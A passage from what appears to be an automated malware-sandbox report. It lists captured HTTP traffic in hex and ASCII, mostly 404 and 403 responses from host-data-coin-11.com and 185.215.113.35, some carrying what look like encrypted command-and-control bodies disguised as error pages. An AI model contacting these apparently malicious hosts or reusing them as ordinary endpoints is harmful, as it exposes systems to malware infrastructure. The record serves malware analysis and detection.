68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e8 ae 88 70 bc 57 dd 43 df f9 21 87 26 ec c3 91 50 23 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9FpWC!&P#c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 0f 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU:@Rw0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 08:25:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 
33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 08:26:00 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 32 31 35 2e 31 31 33 2e 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 185.215.113.35 Port 80</address></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 08:26:07 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a | Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 08:26:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 01 11 91 1d f4 0d 0a 30 0d 0a 0d 0a | Data Ascii: 29I:82OU:@Rw0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 08:26:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 
